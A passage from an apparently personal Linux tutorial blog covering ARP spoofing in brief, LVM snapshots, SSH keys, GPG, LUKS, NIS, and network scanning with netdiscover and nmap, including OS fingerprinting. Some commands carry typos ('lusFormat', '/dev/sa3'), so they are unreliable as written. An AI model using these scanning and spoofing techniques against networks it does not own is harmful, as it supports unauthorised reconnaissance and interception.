responses, they are gonna go to the attacker system, coz it thinks that I am the victim and then I
am going to forward it to the victim.
Note: Communication inside the network is carried out using the MAC address and not using
the IP address.
This is the major drawback of ARP protocols, attackers could easily become Man in the middle
attack by using ARP spoofing. This attack even could steal all your sensitive information.
Learning more about the ARP makes many networking situations more clear, Its one of the
things you need to understand to be in the top 5% of IT Professionals.


10, 2021



Leave a comment RHEL Networking arp, gateway, tcp/ip 8 Oct 2020 VASANTH NIRMAL
How To Take LVM Volume

Live Snap Shot?
14 Sep 2020 VASANTH NIRMAL
Snapshots are pointing in time copy of your server file-system/partitions/volumes at a certain
period of time.The snapshot captures the entire file-system as it was when the snapshot is taken.
Scenario: For instance when you have deleted some important data’s or files after creating a
snapshot ,Nothing to worry because we have the snapshot which holds the original data’s/files
which you have deleted.
Note:Snapshots can’t be used for backup as backup are the main/primary copy of data’s,that is
the reason you cannot use the snapshot as your backup option.
Click the below Link to know about LVM Partitions ,to create Physical Volumes,Volume groups
How to create Disk Storage/Extend sizes with LVM
Step:1 Taking LVM Snapshot

Before we take the snaphot you have to verify the free space avaiable in the volume group,you
can check it with the following command
#vgs or vgdisplay
As you can see from the above output 22GB of free space are left in the above Volume
group(VG) don.Let me create a snapshot for my Lv bankdata.
I am going to create a snapshot volume with the size 1GB for demo purpose.
To create Snapshot run the following

command
#lvcreate -L +1G -s -n bank_snap /dev/don/bankdata
-s =To create a Snapshot
-n =Create a new name for snapshot
1G =Size of the snapshot
bank_snap = New snapshot name
/dev/don/bankdata =Volume which we are going to create the snapshot
Check the LV Volumes by using the following
command
#lvs or #lvdisplay
As you can see from the above output Snapshot volume has been created succesfully with the
size of 1GB,From the above output the “origin” column says that the snapshot is taken from the
source volume “bankdata”,the “snap%” showing 0.00 which indicates no datas have been
updated to that volume so far,Let me add some datas to the volume “bankdata” and then check
the snapshot volume size again
As you can see from the above output the volume now utilized some disk space,Now check the
logical volume size
For More Video Tutorials Visit My Linux Vasanth You Tube Channel
This time as you can see the snap shot volume also synced ,whenever you put some data’s in the
source volume,the snapshot linked with this volume will also get synced equally.
Click here to Subscribe to get More Linux tutorials

10, 2021


1 Comment RHEL(Red Hat Enterprise Linux) data migration, Disk

parition, Linux, lvm, snapshot 14 Sep 2020 VASANTH NIRMAL
How to Set Up Password Less

Authentication in SSH Linux
Server
23 Aug 2020 VASANTH NIRMAL
SSH(Secured Shell) used for establishing an encrypted connectivity between the remote
servers,The most used and powerful tool trusted by large number of Linux /Unix Administrators
all over the world.After establishing the connection whatever the command you execute from
your Local terminal are passed through an SSH Tunnel with encryption .
Visit this Link to Know More about SSH https://www.linuxvasanth.com/understanding-ssh-

scp-protocols-linux-operating-system/
We can apply two different methods for enabling SSH
1. Password Based Authentication
2. Public Key Based Authentication
What is Public Key Authentication?
It can be also known as Password Less Secured Shell Authentication,there are some advantages
with this Public Key Based Authentication,They are
1. Much Secure to the user passwords because it works only with the public and private Key
Cryptographic
2. It can be easily Configure
To Know More about Public and Private Key cryptography algorithm click
https://www.linuxvasanth.com/learn-how-to-encrypt-and-decrypt-a-file-data-using-gpg-pgp-
algorithms-in-linux/
Initial Check up’s before we start Configure Password
less SSH Key
The first most important thing is you will need to configure one Public Key and then verify
whether the SSH Client key already exits,run the following command to verify that
#ls -la /root/.ssh/id_*pub
If the key doesn’t found then it will print you the output as follows
No such key Found Public/Private
To Create Public and Private Key

Run the following comand to create the Key pairs
#ssh-keygen -t rsa
-r = To Indicate the protocol used for to create Key generation
The above command can also be run with the default type as follows
#ssh-keygen -t rsa -b 4096
If you want a stronger key then you can mention it manually with the -b option,Because the
default Key is 2048 Bits.
To generate Key with Stronger Security
Run the above command with the -b option as follows
From Local Server 192.168.43.15 i am executing the below command

#ssh-keygen -t rsa -b 4096
I recommend always use 4096 bits in-order to have a stronger Security keys streams
Note:My Local Server IP:192.168.43.15 Remote Server IP:192.168.43.15
When you run the above command it will ask you to fill some details as the command will run in
the interactive mode,it will ask you to mention the following information
1. File name and Location where the KEY should be stored

2. Type the passphrase
Note:The passphrase is used to encrypt the Private Key,For the first option just press enter to
select the default value,Next press enter and put a strong passphrase with minimum 15 characters
long
ww
w.linuxvasanth.com
Note:The Private Key will be stored by default in the path .ssh/id_rsa file
Note:The Public Key will be stored in the default path .ssh/id_rsa.pub file
The combination of both the keys(Private and Public Keys) generates a complete Key stream
Now as you can see from the above output check the id_rsa file you will see the private key is
encrypted,now upload the public key to the remote Linux server
Click here to View More Linux Videos

Upload Public key to Remote server
There are lots of methods available to send this key file to the remote server,with ssh tool we can
also easily transfer with the help of ssh-copy-id command,this command comes by default with
the ssh packages
Syntax:#ssh-copy-id remoteuser@Remote server IP
#ssh-copy-id vasanth@192.168.43.68
https
://www.linuxvasanth.com
Now the Public Key is Generated and stored in .ssh/authorized_keys file under the remote user
home directory path.
Log in to remote server with SSH
#ssh vasanth@remote ServerIP
#ssh vasanth@192.168.43.68
Now you will have to enter the passphrase key RSA to unlock the private Key.If you enable the
Automatically unlock this key whenever i’m logged in,then you dont have to type passphrase
anymore.
https://www.youtube.com/channel/UC6bR8In-jj9-klVlZQ6YH_A
After successfully entered the key passphrase,it will allow you to log in to the remote server.Let
us log out and log in again from the remoterserver
#exit
#ssh vasanth@192.168.43.68
This time it allow you to log in automatically with out having type the passphrase,Now on wards
you can login and transfer the data with out having to type the password,with scp we will transfer
the data,scp comes along with the ssh family.
I hope this article is useful for you to implement password less login in SSH
If you Find this article useful,then subscribe to my website and YouTube channel to receive
more Linux tutorials
Follow Me On Social Networks



Click here to Subscribe linuxvasanth.com

General

RedHat 7.0

RHEL Networking

RHEL(Red Hat Enterprise Linux)

SHELL SCRIPTING

SOLARIS

UNIX

10, 2021
[…] https://www.linuxvasanth.com/install-packages-redhat-linux/ How to install packages

with “rpm” tool […]

Leave a comment RHEL(Red Hat Enterprise

Linux) Linux, securedlogin, server, SSH, sshserver, tcp/ip 23 Aug 2020 VASANTH NIRMAL
Powerful tools in Linux for
Network Scanning (Net
discover)
Net discover is an powerful ARP scanner can be used to fetch information about the wireless
networks and can be also used to do a deep scan for the hosts in a network.It can be used to
inspect your network’s ARP traffic or to find the network addresses by using the option auto
scan mode,which will scan for Common local networks.
It discover all devices on the network display their:
1. IP address
2. MAC address
3. Operating System name
4. Open ports
5. Running services and many more…..
Let me show you the examples how to run the scans
Ex:1 To discover all the devices connected to the same Network

My server IP is
https:
//www.linuxvasanth.com
#netdiscover -r 192.168.43.1/24 (-r=Mean "range" to scan given range instead of auto scan)
This method will work on real network or even in wifi/wireless network.
Click here to Subscribe my YouTube Channel
As you can see from the above output,The IP address ,device name ,MAC address everything it
showed
Note:IP’s in the same sub net would start 192.168.43.0 and they would end at 192.168.43.254
24 indicates to show all of the IP’s that start at 192.168.43.0 to 254
You can also the nmap tool to gather sensitive information about connected devices,nmap is an
huge security scanner for IPV4 ranges.
Zenmap Is the Graphical User Interface of nmap,you can put any name or IP to scan,whether it
is personal system or Server or IP for a web server for a website.
#nmap -sn 192.16.43.1/24
Will display the following
1.Connected devices in a Network
2.Their MAC address
3.Host UP/DOWN
4.Device name
Let us see another one example with different options this time,
#nmap -T4 -F 192.168.43.1/24

The above command gives the same information that we seen before but it is also showing us the
Open Ports on each one of the discovered devices.
We can also do more intensive scan with the following options
root@kali:~# nmap -sV -T4 -O -F --verion-light 192.168.43.1/24

The command will display you the following informations from the discoverd devices
1.OS Running on the device along with the version
2.Whether it is a Phone or Laptop or a router
3.Will able to discover the programs and the program version number on the discovered ports
When you simply type “net discover” command with out any arguments then it will start
the “AutoScan Mode”,It will automatically scan and detect servers,hosts,MAC,IP
addresses,Vendor Details and many more information’s,the scan will run until you
press Ctrl+c from your keyboard
#netdiscover
Netdiscover and nmap are the best tools in case if you want to perform a fast network scan.
Click here to Subscribe to receive New updates every week

Click here to Subscribe my You Tube channel
Click below icons to Follow me at Social Networks







10, 2021


 General (3)
 RedHat 7.0 (3)
 RHEL(Red Hat Enterprise Linux) (58)
 RHEL Networking (17)
 SHELL SCRIPTING (7)
 SOLARIS (4)
 UNIX (9)
 Apache Web Server in RHELJuly 10, 2021
 Understanding SWAP Memory(Virtual) in Linux Server.May 25, 2021
 What is KERNEL Program?May 4, 2021
 How to Configure Local Yum Repository Server using ISO in RHEL 7.0 VerApril 16,
2021
 What is Systemd(systemctl) Dameon in RHEL 7/RHEL 6March 31, 2021
 How to Generate Sosreport in Linux Server(RHEL 6.x/RHEL 7.X)March 9, 2021
 Linux Server Monitoring Commands/ToolsMarch 1, 2021
 Important and Useful “df” and “touch” Commands in Linux/UNIXDecember 13, 2020
Leave a comment RHEL Networking arp, macaddres, netdiscover, Network
configuration, Network tool, networkmapper, portmap, tcp/ip 14 Aug 2020 VASANTH
NIRMAL
Learn How To Encrypt and

Decrypt A File Data Using
GPG/PGP Algorithms in
Linux.
As many of us know how to send or share your sensitive data’s over a network,When the data is
on air there is no guarantee that the data reaches the destination without any tamper or modify, as
someone could intercept the data and they could add a backdoor programs which will run in the
background to steal or gain full access of your system.
Note:You might be boring reading the whole explanations but i can ensure, you will
understand the theory behind the public and private encryption how it is working.
So always we need to be very careful about the network we select to access is a trusted one and it
is using the end to end encryption algorithms,so that even if any one intercept the data they could
not view or read the content ,it will be useless because it will be simply gibberish and it will be
only decrypted once it is received by the person that we want them to receive it.
This is all great but first of all we have to trust that these methods of communications are
implementing the encryption correctly, that there are no problems or no flaws in the way that
they are encrypting and decrypting the data.
What if we want to send a data through a website or through a form of communication that
does not support encryption? In this case you will have to manually encrypt your data and the
person that receives the data have to manually decrypt it
Managing foreground and background processes

So in this post i will be explaining about the symmetric and asymmetric encryptions and how
it works then why we prefer to use the end to end encryptions.
Then after that i will be showing you how to manually encrypt the data whether it is a text or file
or mp3 or jpg or pdf and also i will show you how to decrypt the data to view the content once
you receive it.
How to use BGP/PGP to encrypt /decrypt a data?
The reason why i am using the BGP/PGP for encryption and decryption because this is a very
strong encryption that stood the test of time and has not been broken yet even based on
leaked reports,even government agencies are not able to break it yet,so its very very very strong
encryption
How PGP works in general?

PGP is a Public Key or asymmetric encryption and to understand this how it works let us first
have a look on the traditional type of encryption called Symmetric .
So let us have an example where we have two people Vasanth and Nirmal and we are
going to forget about how they are going to communicate ,if you want to know the remote login
and file transfer concept vist this link https://www.linuxvasanth.com/understanding-ssh-scp-
protocols-linux-operating-system/ and the content of the message is for example “very secret
data” now if vasanth wants to protect his message from anyone who might intercept this
message or read it, he can use an encryption key in order to encrypt this message and this
will transform the message in to gibbersh and then he can go ahead and send this message
to Nirmal using any method by sending it as an email or by post or by text message,it doesn’t
really a matter
And if this message gets intercepted the contents of this message is going to be gibberish,so
it wont be useful to a person who is intercepting this.
Nirmal will open the file,the message will still be gibberish ,and then Nirmal is going
to use the same encryption key to decrypt this message and reveal this content.
So very simple,basically vasanth uses a key to encrypt the message and Nirmal uses the same
key to decrypt it and this way they are both able to read the message,so the same key is used
by vasanth and nirmal,therfore this is called as an Symmetric encryption
So now probarbly guessed it by now,This key needs to be private.That’s why it is called as an
secret key because any body who manages to get his hands on this key they will be able to
decrypt any message that vasanth sends to nirmal ,So the secret key should be kept secret always.
But vasanth somehow has to share it with Nirmal and anyone else vasanth wants to
communicate with,therefore this is the major flaw with the Symmetric encryption because the
key has to be secret but at the same time has to be shared and sharing it with more people
increases the attack .
Learn Python Basics
How are we going to share it? Are we going to send it in a separate message? what if
that message gets intercepted? What if we are sending over the internet and we know how many
hubs our data could pass by this could be intercepted read and the rest of our
communication will be decrypted.
This was the main incentive to come up with a more secure encryption and this is where
asymmetric or public key encryption comes
Now lets us go back to the scenario again,vasanth wants to send message to nirmal and this time
asymmetric encryption is used to encrypt the data,the message is sent in

the air and then another key is used to decrypt the message.
So as you can see in this encryption(asymmetric) two different key are used and hence the name
asymmetric encryption.Now these two keys are referred to as key pair,one is used for
encryption and another is used for decryption,therefore the decryption key is never shared
and that’s why it is more secure.
Ok fine you may be thinking if the decryption key is never shared how is this going to work??
So again i tell you the same,vasanth wants to send a message to nirmal,but before sending this
message and before encrypting it nirmal is going to create a key pair a public key and a
private key.
And nirmal will send the public key to vasanth to the person that will send the message,so
the public key can be shared it with anybody even you can also shared it public on the internet
on key directories,it doesn’t really a mater because it cannot be used to determine the private key
therefore it is completely safe to share the public key.
So now vasanth received the public key from nirmal,now vasanth uses this public key to encrypt
the message and he can send it to nirmal by using any method. Nirmal will receive the message
but still be gibberish but he will use the private key to decrypt the message and as i said the
private key was never shared.
Nirmal created the private key and he kept the private key,the only thing that is shared is
the public key which cannot be used to determine the private key and cant be used to
decrypt the message it can only be used to encrypt the message.
So by the end of the commnuication vasanth is going to have nirmal’s public key and nirmal is
going to keep their private key.
So the whole idea is very simple,you share your public key that is completely safe because it
cant be used to decrypt the data and anyone who wants to send you a message they will
encrypt that message with your own public key and this way you will be the only one that can
decrypt the message.
Now let me show you how to encrypt the message and then how nirmal will decrypt the
messsage.
How to install GPG/PGP to perform encryption?

In Linux dist you can use the your own package manager to install this for example Redhat uses
“rpm” or “yum” and in this example i will be using Debain based OS soi use “apt-get” to install.
root@kali:~# sudo apt-get install gnupg

Reading package lists… Done
Building dependency tree
Reading state information… Done
The following package was automatically installed and is no longer required:
python3.7-minimal
Use 'sudo apt autoremove' to remove it.
Suggested packages:
parcimonie xloadimage
The following NEW packages will be installed:
gnupg
0 upgraded, 1 newly installed, 0 to remove and 1341 not upgraded.
Need to get 0 B/749 kB of archives.
After this operation, 806 kB of additional disk space will be used.
Selecting previously unselected package gnupg.
(Reading database … 310305 files and directories currently installed.)
Preparing to unpack …/gnupg_2.2.20-1_all.deb …
Unpacking gnupg (2.2.20-1) …
Setting up gnupg (2.2.20-1) …
Processing triggers for man-db (2.9.0-2) …
root@kali:~#
Now create a Public/Private Key
Run the following command to generate the keys
root@kali:~# gpg --full-generate-key
Once you executed you will get a menu as follows,
Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
(14) Existing key from card
Your selection? 1
You have to select the option “1” RSA and RSA(default)

After this it will ask you to select the key size,the bigger size will increase the security ,so select
4096 bits,
RSA keys may be between 1024 and 4096 bits long.

What keysize do you want? (3072) 4096
Requested keysize is 4096 bits

Next it will ask you to set the expiry days for this key,you can set the expiry details in
months,days,weeks or years as you wish,here i am gonna set to “Never expires”.
Please specify how long the key should be valid.
0 = key does not expire
= key expires in n days
w = key expires in n weeks
m = key expires in n months
y = key expires in n years
Key is valid for? (0) 0
Press “0” and enter
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y
Press “y” and enter
GnuPG needs to construct a user ID to identify your key.
Real name: asuren
Email address: asuren@demomail.com
Comment: datasecurity
In this Enter your name,email and comment details about this key
It will be ask you to confirm,press”O” and return
You selected this USER-ID:
"asuren (datasecurity) asuren@demomail.com
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
Now it will ask you to enter new password to protect your key
dav
generator a better chance to gain enough entropy.
gpg: key 2450F11C2E4F14DB marked as ultimately trusted

gpg: revocation certificate stored as '/root/.gnupg/openpgp-
revocs.d/3BC727974C78F9743583EE252450F11C2E4F14DB.rev'
public and secret key created and signed.
pub rsa4096 2020-07-25 [SC]
3BC727974C78F9743583EE252450F11C2E4F14DB
uid asuren (datasecurity)
sub rsa4096 2020-07-25 [E]
That’s it we have successfully generated the key for encryption.
You can list the keys in your database key ring as follows
root@kali:~# gpg --list-keys

gpg: checking the trustdb
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 2 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 2u
gpg: next trustdb check due at 2022-07-23
/root/.gnupg/pubring.kbx
sub rsa3072 2020-07-23 [E]
pub rsa4096 2020-07-25 [SC]
3BC727974C78F9743583EE252450F11C2E4F14DB
uid [ultimate] asuren (datasecurity) asuren@demomail.com
sub rsa4096 2020-07-25 [E]
As you can see from the above output the Public and private keys are created.
Let us Encrypt with GPG using Public Key
First create a file and add some contents,imagine this file holds some sensitive datas which
should not be shared it with anyone or with any untrustable persons,So after creating the file i
will encrypt the file with GPG.
#cat /mysecuredata
BANK CARD NUM:095349452
PASSWORD:123abc123abc
Now we have a file and this file is holding some sensitive details,let us encrypt the data as
follows
root@kali:/# gpg -e /mysecuredata

You did not specify a user ID. (you may use "-r")
Current recipients:
Enter the user ID. End with an empty line: asuren@demomail.com
Current recipients:
rsa4096/F2597710BD312E14 2020-07-25 "asuren (datasecurity) asuren@demomail.com"
In this you have to type your mail id which we use to create the encrypion keys,thats all now
GPG will exit and prompt you the shell prompt
Check whether the encrypted key is present in your path
root@kali:/# ls
ap csk.sh mysecuredata
icc lrHXxKyd.jpeg mysecuredata.gpg
root@kali:/#
You will see two files now,the first one is the original source file and the second
one mysecuredata.gpg is the encrypted file.Now if you try to read the content you will get
gibberish as the file is encrypted,to read the content you will have to decrypt the file.
Now the last step is to encrypt with an ASCII encoding as follows
root@kali:/# gpg -a -e -r asuren@demomail.com mysecuredata

root@kali:/# ls
ap csk.sh icc mysecuredata.asc srv usr
auto.sh demo.sh initrd.img media mysecuredata.gpg
boot home lost+found mysecuredata sbin UIdwZany.html

root@kali:/#
As you can see from the above output now we have three files and you should see an .asc file
1.mysecuredata.asc 2.myecuredata.gpg 3.mysecuredata

Let us remove the original file
#rm -vf mysecuredata

To Decrypt a file with GPG/PGP run the following command
#gpg mysecuredata.asc
GPG will automtically find out who the file is encrypted for and checks to see if you are in
ownership of the private key and you will be prompted for your password
Type password to unlock the key: *****
Enter the passpharse:*****

That’s all ,now check the content from the ‘mysecuredata’ file to confirm whether it is properly
decrypted
This is how we encrypt and decrypt the sensitive data’s with the help of GPG/PGP in Linux
distributions..
I hope you have enjoyed this article,If you have any queries you can put a comment in the
comment box
Kindly visit my YouTube Channel and if you are satisfied click here to
Subscribe
Click here to Subscribe linuxvasanth.com updates

10, 2021


2 Comments RHEL(Red Hat Enterprise Linux) decryption, encryption, gpg, Linux, luks, pgp 26

Jul 2020 VASANTH NIRMAL
Linux Unified Key Setup Tool

26 Jun 2020 VASANTH NIRMAL
What is LUKS?
Data Protection is the most important concerns everywhere in Information technology
environment,In Linux we have a powerful tool called “LUKS” which will encrypt the data/disk
in “Block Level Devices”.This encryption can be setup when you are doing the installation and
also after setup the installation.
LUKS Stands for “Linux Unified Key Setup”
How does LUKS Protect the Disk?
The encryption really works with the Block Level devices,For example if a hard disk or its
partition is protected with the LUKS encryption,the data within is at least much more secure
because this encryption method require a password to access it .
Confuse with Block Level Devices??

The Block Level Devices is nothing but ,the raw volumes of the storage are created and each
block can be controlled as an individual hard drive and these types of blocks are controlled by
the Server based OS and this each and every block could be individually formatted with the
required file systems.
Let us Configure the disk encryption ,here i am going to show the encryption after installation
process get completed,I have an Linux server installed and its ready to do the setup….
Things Need to check before you start the encryption?
1. dm_crypt modules
2. cryptsetup-luks rpm
Note:LUKS needs dm_crypt modules and cryptsetup-luks rpm
First Make sure both of these are already installed in my Linux server(I am using RHEL6.2)
Run the following command to check it
#lsmod |grep dm_crypt
https://www.linuxv
asanth.com
Note:As you can see from the above screen shot ,both the required modules are not
loaded,If it is not loaded by default then you can Load the modules manually with the command
“modprobe“,This is the command designed to run the modules manually,let load the modules
now as follows,
#modprobe dm_crypt
Now verify,
#lsmod |grep dm_crypt
https://
www.linuxvasanth.com
As we have seen from the above output now both the modules are loaded successfully.
Now let us confirm whether the “cryptsetup-luks” rpm is installed or not with the below
command,
#rpm -qa cryptsetup-luks
https://www.linux
vasanth.com
As you have seen from the above output the cryptsetup-luks rpm is already installed
What is lsmod?
Is the command which is used to view the modules that are currently Loaded in the
Kernel.To more about lsmod command you can run the “man” command a follows
#man lsmod
Now before we start creating an encrypted disk partition filesystem,you will need a partition,any
partition methods you can use LVM,RAID,in this example i am gonna create a very simple
partition with the size of 200MB by using the fdisk method. If you don’t know how to create a
partition with fdisk command you can visit this link

https://www.linuxvasanth.com/create-partition-linux/
I have created a partition with the number 3 i.e /dev/sda3 with the size of 200MB as shown
below,
ht
tps://www/linuxvasanth.com
Now reboot the server to update the newly created paritions in the kernel memory
#reboot -f
So after reboot we have to format with the ext4 file system,in this example i am not going to do
this rather i use “dd” command to fill the partition with some random data as follow,
#dd if=/dev/urandom of=/dev/sda3 bs=1M
The above command will fill the entire partition size fully with the random data’s.
http
s://www.linuxvasanth.com/
As you can see from the above output ,the entire 200MB partition size s filled up with some
random data’s,the partition is now with no space left to store any data.Now we have to create a
password for the file system with the help of crypt setup command,when you run this command
it will ask you to type a new password and a confirmation,
#cryptsetup lusFormat /dev/sda3
https://www.linuxvasanth.com/
Note: Don’t type “yes” in lowercase when it is asking you for the confirmation,if you do then
the disk will not encrypted,So type “YES” in uppercase.
Hi Visit my YouTube Channel and Subscribe ,Kindly Support me to do more
tutorials https://www.youtube.com/channel/UC6bR8In-jj9-
klVlZQ6YH_A
Now we have successfully encrypted the partition ,Remember once you have generated partition
and created the encryption on that it will be available under the path /dev/mapper directory,You
will have to give a new label name and this label name will show up below the /dev/mapper path.
#cryptsetup luksOpen /dev/sa3 safe_mydata
Note:safe_mydata i the label name which will store under /dev/mapper path
#ls /dev/mapper
As you can see from the above output,the label name safe_mydata has been successfully created
under the /dev/mapper path
Now to make it writable we will need to create a new file system on the partition,let us create a
new file system on the partition as follows,
#mkfs.ext4 /dev/maper/safe_mydata
https://
www.linuxvasanth.com/
We have successfully created the new filesystem on the partiton,now we need to add the entry in
the /etc/fstab and /etc/crypttab file,so that it will be avaiable after reboot the server


Now open the file with the vi editor as follows,
#vi /etc/crypttab
safe_mydata /dev/sda3
Just add the name of the encrypted device and its path in the above file.
Verify with the help of cat command after adding the entries,
#cat /etc/crypttab
https://www.linuxvasanth.
com/
Everything is perfect,now create a mount point and add its entry in the /etc/fstab file,so that
when the server next rebooted or powered on this partition will get auto mounted.
#mkdir /safe_mydata
#vi /etc/fstab
Add the following entries inside the file,
/dev/mapper/safe_mydata /safe_mydata ext4 defaults 0 0
https
://www.linuxvasanth.com/
Perfect!!!! We have done it,now run the mount command with -a option to update all the
partitions in fstab file

#mount -a
Now on the next reboot the system will ask you for the password,type the password to
unlock the partition,you can only access the partition with the correct password,
After giving the correct password verify the partition by accessing its mount point directory as
shown below in the screen shot
How to Verify if a Hard drive is encrypted on Linux?
Here we have a drive /dev/sda,and the partition you want to check is /dev/sda3,then run the
following command
Click here to Watch LUKS on YouTube
Channel
#blkid /dev/sda3
Note:The output will change if the partition is encrypted,if not encrypted it will show the type of
file system the partition is using
http
s://www.linuxvasanth.com/
As you can see from the above screen shot,I have checked it with two partitions,/dev/sda3 is
encrypted with LUKS and /dev/sda2 is not the encrypted partition that’s why it is showing
its file system type ext4.
That’s it Perfect We have Successfully Completed this..Hope you have

Enjoyed this article
If you really like the content kindly do support
and subscribe by clicking the below links
Click Here to Subscribe linuxvasanth.com Updates
Click Here to Subscribe My YouTube Channel

10, 2021


2 Comments RHEL(Red Hat Enterprise

Linux) Diskmanagement, disksecurity, encryption, fdisk, luks, mkfs, modprobe, mount, partition
26 Jun 2020 VASANTH NIRMAL
How to Scan the Ports using

Socket(ss) Utility in Linux.
In this article i will show you the easiest way to get the client information via which port they
have logged in to the server and many more details
As all we know in Linux all the services running on the server is listening to the socket for client
to make the connection request.After the successful connection from the client one socket (i.e
port and IP address combination) is generated
To fetch the full details regarding port status,IP in Linux more commands are available like “net-
stat”,tcpdump to get the port details,To get the Socket details in easiest way we use the command
called “ss”(Socket) ,this command will open the network socket related details on a Linux
Server.
Ex:1 To print Socket details of all the Clients connected to a Port or

Service
#ss
The above command is similar to “netstat” command.

Ex:2 To list all the clients connected to the port 80 or 443 i.e HTTP and
HTTPS
#ss -o state established ‘( sport = :http or sport = :https )’
Ex: To get the status of SSH port

#ss -tn src :22
That all for now from this Short Article.
Stay tuned for more updates..

10, 2021


Leave a comment RHEL Networking netstat, network, port, socket, tcp/ip 11 Mar

2020 VASANTH NIRMAL
What do you Mean by

NIS(Network Information
Service)?
17 Feb 2020 VASANTH NIRMAL
NIS is developed by Sun Micro System to simplify the Network Administration.
NIS acts like a centralized server to manage hosts,services,password authentication which

would normally given by local files
 Login names/Password/home directories=/etc/passwd
 Group Information=/etc/group
 Host names and IP address=/etc/hosts
For example if your password entry is saved in the NIS password database then you will be
able to login on all the machines on the network which have NIS client program
NIS client system look to the NIS server to provide this data.
With NIS each and every host,client,server computer in the system has knowledge about
the entire system.A user at any host can get access to the application or files on any host int
he network with the single user identification and password.
Note: NIS is similar to Active Directory in Windows Server 2016
NIS uses Client/Server Model and Remote Procedure Call(RPC) interface for
communication between hosts
Configure NIS Server

In this example i will configure a NIS Server and a user with the name user1 from client end .
Here we are using two systems one Linux server and one Linux client
 Linux Server with IP address 192.168.56.101 and hostname SBI
 Linux client with IP address 192.168.56.156 and hostname PVR
 Check xinetd service is running
 Turn off the iptables
 update the /etc/hosts file on both the server
Following rpm’s are required to configure NIS server,make sure all the required rpm’s are
installed already.
 ypserv
 ypbind
 nfs
 make
 xinetd
 cache
https://www.linuxvasanth.co
m
Now its time to check the follwing services are in online
 nfs
 ypserv
 yppasswdd
 ypbind
 xinetd
#setup
then choose the system services and activate the above services
Open the /etc/sysconfig/network file
https://www.linuxvasant
h.com
update the hostname and NIS domain name as follows and save it
Now create a user with the name user1 and set /rhome as the default home directory with full
permission.
https://www.linuxv
asanth.com https://www.linuxvasanth.com
now open the /etc/exports nfs file and set the following details
Click this link to learn about NFS concepts

#vi /etc/exports
/rhome/user1 *(rw,sync)
save the file and exit
open the /var/yp/makefile
locate the line number 117 and remove the other entry from this lines
expect passwd,group,hosts,netid \
Use the option ESC +: set nu to display the line numbers
restart the following services

#service portmap restart
#service xined restart
#service ypserv restart
#service nfs restart
#service yppasswdd restart
Note:Do not restart the ypbind service now as we have not yet update the NIS database
now change the path to /var/yp and execute the make command to create the database
#cd /var/yp
#make
then Update the database by running the following entries
once you have updated restart all the services once again to take effect and also make all the
services to online upon next reboot with the help of chkconfig command
 service xinetd restart
 service nfs restart
 service ypserv restart
 service yppasswdd restart
 service ypbind restart
 chkconfig xinetd on
 chkconfig nfs on
 chkconfig ypserv on
 chkconfig ypbind on
 chkconfig yppasswdd on
thats it we have done with the NIS server configuration ,next we need to set up the NIS client as
follows.
First check the connectivity between the Server and Client before you start doing the
configuration,try to Login in to NIS Server from telnet,if the connection is successful via telnet
then mount /rhome/user1 directory via nfs server.
If you have got no error on the above test then start doing the client side configurations.
On client side configuration two rpm’s are required

 yp-tools
 ypbind
Check the above rpm’s are already installed,if not try install them
Now edit the /etc/sysconfig/network file as follows
https://www.linuxvasanth.c
om https://www.linuxvasanth.com
save the file and quit
Then run the setup command and choose authentication configuration from the options
https://www.
linuxvasanth.com
now mark nis and choose the next option
then set the domain name to rhce and server 192.168.56.101
After selecting the ok option it has to show the following output without any error
if you get any error then try check the configuration from the beginning
Now edit the /etc/auto.master file
at the end of the file add the following entries
/rhome /etc/auto.misc
Auto master: To automatically mount any file systems on demand as and when you access
them not only it will mount automatically but it can automatically unmount the file system
when not in use for a mentioned predefined timeout value.
 Syntax will look like this
 mount-point map-name options
 /rhome= The autofs mount point,.rhome here

 /etc/auto.misc=The name of the map which holds the list of mount points,and the file
system location with those mount points should be mounted
now open and edit the /etc/auto.misc file as follows
Note:/etc/automaster file is the primary configuration file for automounter also called as Master
map file,this file listed the auto-fs controlled Mount points,and their corresponding configuration
file called as automount maps.
#vi /etc/auto.misc
user1 -rw,soft,intr 192.168.56.101:/rhome/user1
save and quit
Syntax for auto.misc file is
mount-point option location
 mount-point=This refers to the auto fs mount point

 location=This refers to the file system location such as local file system path
Restart autofs and ypbind services
make these services on with chkconfig program
#chkconfig autofs on
#chkconfig ypbind on
Now restart the system
#init 6
After reboot Login with the username “user1” on client system
after logged on check the current path with pwd,it has to show /rhome/user1
#telnet 192.168.56.156
That’s all from NIS ,Stay Tuned for More Updates

10, 2021


Kindly SUBSCRIBE My You Tube Channel

If you Like what you are reading Kindly SUBSCRIBE My website to receive the Updates
Never miss an article Do like my official FB page
Leave a comment RHEL Networking Active directory, autofs, nfs, NIS, portmap, solaris, yp 17
Feb 2020 VASANTH NIRMAL
How to use Network Mapper

tool in Linux?
16 Jan 2020 VASANTH NIRMAL
Nmap(Network Mapper) is an open source tool for Linux system/Network administrators. With
this tool system administrator can easily reveal the hosts and services,search for system issues
and scan for open ports and many more.
I will be covering some of the important Nmap usages,Here in this example i have used two
Linux servers without enabling the firewall to test the working of nmap command.
Ex:1 To scan a server with Host name

and IP address
Here i am performing a scan using linuxvasanth.com to list out all open ports,services and
MAC addresses on the system.
Ex:1 To scan using a host name

Syntax
#nmap <Host name>

#nmap linuxvasanth.com
ht
tps://www.linuxvasanth.com
To scan using the IP address

#nmap 192.168.1.144
My server IP address: 192.168.1.144
Ex:2 To scan using Verbose Option “-v”
#nmap -v 192.168.1.144
You can see now the below command with -v option will give you the detailed report
Ex:3 To scan a whole sub net

You can scan a whole subnet or IP range by providing the wild card character *
#nmap 192.168.1.*
Ex:4 To scan list of Hosts from a file
For example if you have more hosts to scan then all the hosts details are copied in a file,you can
directly ask the nmap to read the file to scan the hosts
Let me create a file “myhost.txt” and mention all the host name and IP address of the server to
do the scan
#cat >/myhost.txt
192.168.1.6
productionserver
linuxvasanth.com
www.linuxvasanth.co
m
Now run the nmap command with the -iL option to scan all the listed IP in the file
Ex:5 To scan OS and the trace route

With nmap command you can also get the OS version running on the remote server,scanning and
trace route with the help of -A option
#nmap -A 192.168.1.144
As you can see from the output nmap came up with the TCP/IP finger print of the OS running
on the remote server and more about the ports and services running on the remote server.
That’s it with Nmap for now,Stay tuned with us and don’t forget to share and comment
your feedback
